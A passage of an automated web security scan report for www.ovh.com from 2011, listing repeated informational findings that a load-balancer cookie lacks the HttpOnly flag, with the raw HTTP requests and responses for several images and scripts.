Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f6f-1f71-488c3680004a2"
Accept-Ranges: bytes
Content-Length: 8049
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:23:49 GMT
Age: 2832
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.........................................................#.@.................................
...[SNIP]...

3.32. http://www.ovh.com/fr/images/index/rps.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/rps.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/rps.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f5e-27f7-488c367feac54"
Accept-Ranges: bytes
Content-Length: 10231
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3504
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.33. http://www.ovh.com/fr/images/index/slidebg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/slidebg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/slidebg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f6b-2594-488c367ffb106"
Accept-Ranges: bytes
Content-Length: 9620
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 771
Content-Type: image/jpeg

......JFIF.....v.v.....C.......................................................................3...................................
...]......... .... ..........!.......1QT......ARSUaq.......237rv...'
...[SNIP]...

3.34. http://www.ovh.com/fr/images/index/sms.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/sms.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/sms.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f86-2bb2-488c36801a0a3"
Accept-Ranges: bytes
Content-Length: 11186
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3504
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.35. http://www.ovh.com/fr/images/index/ssl.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/ssl.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/ssl.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f82-21aa-488c368015180"
Accept-Ranges: bytes
Content-Length: 8618
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 752
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.36. http://www.ovh.com/fr/images/index/sub-ind-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/sub-ind-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/sub-ind-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 05 Jun 2009 09:13:59 GMT
ETag: "2e133-4b7-46b96500ae3c0"
Accept-Ranges: bytes
Content-Length: 1207
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 773
Content-Type: image/jpeg

......JFIF.....v.v.....C.....................................    ...    ......

.....
.

......?.............................    ...........................!........?...u.m']o6...3)......................
...[SNIP]...

3.37. http://www.ovh.com/fr/images/index/telecom-solutions.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/telecom-solutions.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/telecom-solutions.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f76-3744-488c3680080e4"
Accept-Ranges: bytes
Content-Length: 14148
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 752
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.38. http://www.ovh.com/fr/images/index/zmedia.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/zmedia.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/zmedia.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f98-2fc8-488c368030ada"
Accept-Ranges: bytes
Content-Length: 12232
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 751
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.39. http://www.ovh.com/fr/images/prices/red/s1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/s1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/s1.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 03 Feb 2011 11:42:32 GMT
ETag: "2bb967-24c-49b5f42dc5d14"
Accept-Ranges: bytes
Content-Length: 588
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:57 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a
....c..,,.00...........................................

.

.........................''.)). .&&.((.)).@@.HH.MM.QQ.SS.nn.rr.vv.rr.FF.JJ.OO.TT.jj.ll.kk.rr.tt.tt.zz.ww............................
...[SNIP]...

3.40. http://www.ovh.com/fr/images/prices/red/s2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/s2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/s2.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 03 Feb 2011 11:42:32 GMT
ETag: "2bb969-467-49b5f42dc760a"
Accept-Ranges: bytes
Content-Length: 1127
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1791
Content-Type: image/gif

GIF89a...........!!.$$.55.................................. ...............................................................................

............................

............."".!!.%%.%%.##.
...[SNIP]...

3.41. http://www.ovh.com/fr/images/prices/red/s6.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/s6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/s6.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 03 Feb 2011 11:42:32 GMT
ETag: "2bb979-451-49b5f42dcf28d"
Accept-Ranges: bytes
Content-Length: 1105
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1789
Content-Type: image/gif

GIF89a...........''.--................................... .

........................................................................................... ..................................$$.&&.++.
...[SNIP]...

3.42. http://www.ovh.com/fr/images/prices/red/s9.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/s9.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/s9.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 03 Feb 2011 11:42:32 GMT
ETag: "2bb982-45a-49b5f42dd5218"
Accept-Ranges: bytes
Content-Length: 1114
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1790
Content-Type: image/gif

GIF89a........ .)).++.............................................................................................................

...............................................................
...[SNIP]...

3.43. http://www.ovh.com/fr/images/prices/red/sc9.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/sc9.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/sc9.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 29 Sep 2010 09:18:35 GMT
ETag: "2227df-1ff-49162723321b3"
Accept-Ranges: bytes
Content-Length: 511
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:57 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a....................................................................................)).>>.??. .//.GG.JJ.LL.__.^^.LL.bb.``.vv.||.dd.cc........................................................
...[SNIP]...

3.44. http://www.ovh.com/fr/images/prices/red/scurrency.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/scurrency.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/scurrency.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 29 Sep 2010 09:18:35 GMT
ETag: "2227b7-222-491627230873a"
Accept-Ranges: bytes
Content-Length: 546
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:57 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a............................................................................................((....)).)).,,.%%.==.AA.RR.RR.YY.ee.``.bb.ii.nn.oo.{{.pp.{{.yy........................................
...[SNIP]...

3.45. http://www.ovh.com/fr/images/prices/red/sdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/prices/red/sdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/prices/red/sdot.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 29 Sep 2010 09:18:35 GMT
ETag: "2227e3-9d-4916272336230"
Accept-Ranges: bytes
Content-Length: 157
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:57 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a.............................

..##.44.55.77.77.__.xx................................................!...
...,............'.di.h..l.N.R}Q@."..'9...;

3.46. http://www.ovh.com/fr/index.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/index.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/index.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:51:14 GMT
ETag: "2b65a2-23fb-49ce1c9d9df82"
Accept-Ranges: bytes
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:24 GMT
Vary: Accept-Encoding
Age: 1
Content-Type: text/html; charset=utf-8
Content-Length: 30523

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>H..bergement et Solu
...[SNIP]...

3.47. http://www.ovh.com/fr/javascripts/nav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/javascripts/nav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/javascripts/nav.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 17:05:43 GMT
ETag: "2f7c2-353-49ce1fd9e9902"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:33 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 851

//javascript document

// Easy function allowing popup options/

function open_page(URL)
{
// check if we have GET param and hod it in url
if (URL.match('=') != null) {

...[SNIP]...

3.48. http://www.ovh.com/fr/javascripts/sessionAjax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/javascripts/sessionAjax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/javascripts/sessionAjax.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "e138-1470-49ce1fd9e3d34"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:27 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 22 Feb 2011 17:05:43 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 5232

// this package relies on some cgi that will give session info from session cookies contained in web browsers

// this code is used to allow customer to use their session
// from any page on the websi
...[SNIP]...

3.49. http://www.ovh.com/fr/js/Core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/Core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/Core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Jul 2008 10:35:34 GMT
ETag: "6a16-3cd-4529a62456980"
Accept-Ranges: bytes
Cache-Control: max-age=300
